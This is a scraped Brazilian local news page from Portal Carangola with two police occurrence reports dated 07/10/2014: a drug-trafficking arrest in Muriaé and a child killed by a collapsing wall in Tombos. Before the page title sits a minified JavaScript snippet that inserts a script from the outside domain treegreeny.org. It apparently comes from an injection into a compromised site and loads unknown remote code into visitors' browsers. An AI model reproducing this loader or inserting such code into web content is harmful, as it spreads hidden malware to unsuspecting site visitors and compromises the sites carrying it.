;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 07/10/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 07/10/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 07/10/2014

                        76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO DE AUTOR CONDENADO PRATICANDO TRÁFICO DE DROGAS EM MURIAÉ

Em 06/10/2014, por volta das 16h20min, na Travessa Hormindo Sales Ferrreira, no Bairro Barra, militares do tático móvel  com informações de que R.”M”. estaria realizando tráfico ilícito de drogas pelo local, foi realizado patrulhamento com as atenções voltadas para o indivíduo, sendo que, ao chegarmos por lá, deparamos com o ele transitando pela rua na direção de três outros indivíduos usuários de drogas e já abordados pela guarnição em data anterior. O indivíduo suspeito, que caminhava tranquilamente pela rua, ao avistar a viatura, exitou, o que motivou a abordagem. E, ao submetê-lo a busca pessoal, localizamos no bolso de sua bermuda um pequeno tablete de maconha e a quantia de R$37,00 (trinta e sete) reais em dinheiro trocado. Já os três usuários, ao perceber que abordaríamos o autor, evadiram em desabalada carreira em direção ao Rio Muriaé, onde provavelmente conseguiram se esconder em algum imóvel desconhecido. Ao realizarmos consulta junto ao sistema ISP, constatamos que o autor possui passagens pelos crimes de latrocínio, roubo, lesão corporal e tráfico ilícito de drogas, sendo que este último crime ocorreu em 2011, e pelo qual foi condenado, encontrado-se atualmente em liberdade condicional. Diante dos fatos, foi dada voz de prisão em flagrante delito ao autor e o encaminhado incólume à DPJ, juntamente com o material arrecadado para adoção de demais providências.

75ª CIA PM – CARANGOLA-MG

PM É ACIONADA APÓS ACIDENTE DOMÉSTICO COM VÍTIMA FATAL EM TOMBOS

Em 06/10/2014, por volta das 10h, após acionamento, militares do pelotão de Tombos, compareceram ao pronto atendimento municipal, onde havia dada entrada a criança F.V.L., de 11 anos, supostamente vítima de um acidente doméstico que o levou a óbito.  O local do acidente Rua Sebastião Vargas Neto, Bairro São Sebastião, em uma casa fechada, de propriedade do Sr. L.C.N., residente na cidade de Santana do Livramento/RS. Porém o local do acidente foi na parte dos fundos da casa, divisa com outra residência. Neste local, a criança estava na companhia da mãe, Sra. A.B.C.V., que trabalha no local, tomando conta da Sra. S.R.A.C.. Segundo as duas, a criança já tinha ido no quintal da  casa vizinha, subido no pé de goiaba e voltado para o lado onde elas estavam, e que depois  foi novamente até o quintal e, quando  subiu no muro, este veio a cair, sendo que a criança caiu ao solo e parte deste muro caiu em cima dela. Como a casa está fechada, foi preciso forçar o portão para entrar e socorrer a criança, o que foi feito com a ajuda do Sr. C.M.M., que trabalha próximo.  O muro em questão trata-se de um “remendo”, um muro feito em cima de um outro muro. Compareceu ao local do acidente a perita criminal, bem como deslocou ao pronto atendimento municipal. Após os trabalhos periciais, o corpo  foi liberado e encaminhado para o IML da cidade de Muriáe/MG para a constatação da causa mortis. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.